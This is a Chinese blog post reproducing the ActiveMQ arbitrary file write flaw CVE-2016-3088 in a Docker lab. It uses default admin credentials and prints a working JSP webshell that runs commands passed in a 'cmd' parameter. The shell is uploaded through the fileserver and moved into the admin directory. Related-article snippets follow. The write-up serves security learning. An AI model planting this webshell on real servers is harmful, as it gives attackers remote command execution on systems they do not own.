activemq:CVE-2016-3088

最新推荐文章于 2024-08-29 22:33:51 发布
最新推荐文章于 2024-08-29 22:33:51 发布
阅读量245 收藏 1
点赞数 7
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69670995/article/details/139032350
版权

1开启靶场

docker-compose up -d

2.影响版本

Apache ActiveMQ 5.x~5.14.0

3.漏洞复现

浏览器访问靶机,访问8161端口

http://192.168.200.168:8161/

浏览器访问/admin/index.jsp?printable=true  查看版本信息,用户名和密码默认都是admin

http://host:8161/admin/index.jsp?printable=true

访问/admin/test/systemProperties.jsp页面查看activemq的绝对路径

使用burp抓包

.修改post传参,写入文件

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

访问1.jsp

http://192.168.200.168:8161/fileserver/1.jsp

访问成功,写入文件成功,但是没有执行代码,将1.jsp移动到、admin目录下

访问admin目录下的1.jsp

http://192.168.200.168:8161/admin/1.jsp

GJyt
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【漏洞复现】ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 629
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3089
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
ActiveMQ CVE-2016-3088 分析
示例和笔记
06-07 1849
ActiveMQ是一种流行的开源消息队列软件,支持多种通信协议,并且广泛应用于企业级应用中。其版本1.0到5.14.0存在一个任意文件写入漏洞(CVE-2016-3088),攻击者可以利用该漏洞向ActiveMQ服务器上的任意位置写入恶意文件,从而导致服务器被入侵控制。ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
ActiveMQ CVE-2016-3088
菜鸟的学习笔记
06-28 214
1. 环境搭建 使用vulhub的配置执行命令:docker-compose up -d 一键启动漏洞环境 环境监听61616端口和8161端口,其中8161是web控制台端口。此漏洞出现在 Web 控制台中。 访问http://your-ip:8161/查看网页,说明环境已经运行成功。默认的 ActiveMQ 帐户和密码是admin。 2. 漏洞复现 首先我们先访问http://your-ip:8161/admin/test/systemProperties.jsp,来查看绝对路径。 之后需要使用B
CVE-2016-3088 ActiveMQ漏洞复现
zwj101010101010的博客
07-27 715
这个漏洞出现在fileserver应用中,原理就是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。4、因为fileserver不解析,所以还需要使用MOVE请求来移动上传文件,移动的路径为/opt/activemq/webapps/api/,回显204成功。写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。3、然后将GET修改为PUT,并在目录后加入想上传的数据包。...
vulhub-activemq-CVE-2016-3088复现
qq_42728977的博客
12-08 648
这里写目录标题漏洞编号:CVE-2016-3088影响版本:Apache ActiveMQ 5.x~5.14.0漏洞产生原因:复现 :思考:参考 漏洞编号:CVE-2016-3088 影响版本:Apache ActiveMQ 5.x~5.14.0 https://www.cvedetails.com/cve/CVE-2016-3088/ 漏洞产生原因: ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8429
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 560
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
四合一气体检测仪:全能守护,安全无忧的创新之选
2201_75812475的博客
08-26 392
它采用先进的传感器技术,能够快速响应并准确测量目标气体的浓度,即使在复杂多变的环境中也能保持稳定的性能。同时,设备内置的高精度算法能够智能分析数据,一旦检测到有害气体浓度超过预设的安全阈值,便会立即发出声光报警,甚至自动启动联动装置(如排风扇、切断阀等),以快的速度控制险情,确保人员安全。四合一气体检测仪,顾名思义,能够同时检测并显示四种不同有害气体的浓度,这通常包括可燃气体(如甲烷、丙烷等)、有毒气体(如一氧化碳、硫化氢)、氧气含量以及可能存在的其他特定有害气体(如二氧化碳、氨气等,具体依据型号而定)。
主机安全-网络攻击监测
关注网络安全、云原生安全
08-24 1374
本文介绍主机网络层面上的攻击场景,每种攻击场景举一个例子。监测方面以字节跳动的开源HIDS elkeid举例。针对网络攻击,通常可以考虑从以下方面做规则来源ip:针对异常ip,有访问即告警。访问端口:针对高危端口,有访问即告警。访问频率:针对过多的访问,在一段时间内超过频率即告警。例如,对同一端口或多个端口。
【宝马中国-注册/登录安全分析报告】
08-26 1451
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 532
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块链等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
智能巡检系统,确保到位管理,提升安全效率新境界
wsd56735676的博客
08-26 492
智能巡检系统通过科技重塑巡检流程,实现精准到位、实时数据上传与分析、智能预警与处理,提升巡检效率、降低安全风险、优化资源配置、提升管理水平,引领安全效率新飞跃。
安全升级:Docker部署Redis,启用密码验证
2302_78886445的博客
08-29 629
在redis文件夹里面创建:data文件夹和conf文件夹(文件夹名称随意)
【河北航空-注册安全分析报告-无验证方式导致安全隐患】
最新发布
08-29 582
河北航空有限公司(以下简称“河北航空”)成立于2010年6月,是经中国民航局和河北省政府批准成立的现代化航空公司,可能是这家航司的技术实力一般,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 1264
安全渗透简介和安全渗透测试环境准备。
在野漏洞的应急响应流程
INSBUG的博客
08-26 862
许多时候,对于负责安全工作又不太擅长安全漏洞技术的人员而言,如何应对突发漏洞是工作中主要的难点,这里的突发漏洞指的是两类:一类是通过新闻、咨询推送,被社会舆论所有关注的CVE漏洞,比如前段时间所谓的核弹级别Windows Server漏洞,一类是没有引起足够社会关注,但又在安全行业流传的0-day漏洞,但也仅限于传说,而很少有人真正见过的0-day漏洞。在漏洞的影响范围确定之后,可以通过机构的资产管理工具快速判断漏洞影响的资产范围,对于软件类或配置类的漏洞,则可能需要通过PoC进行手动扫描和评估。
第136天:内网安全-横向移动&资源约束委派
weixin_71529930的博客
08-26 1031
S-1-5-21-1695257952-3088263962-2055235443-1602)" ##(刚才获得的sid值)New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456。生成了一个票据,上传到服务器,利用mimikatz导入票据。
CVE-2016-3088
07-27
CVE-2016-3088是指ActiveMQ中的一个安全漏洞。根据引用\[1\]提供的信息,该漏洞可以导致远程命令执行。攻击者可以通过上传恶意的JSP文件并执行命令来利用此漏洞。具体的攻击步骤如下: 1. 下载vulhub中对应环境的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值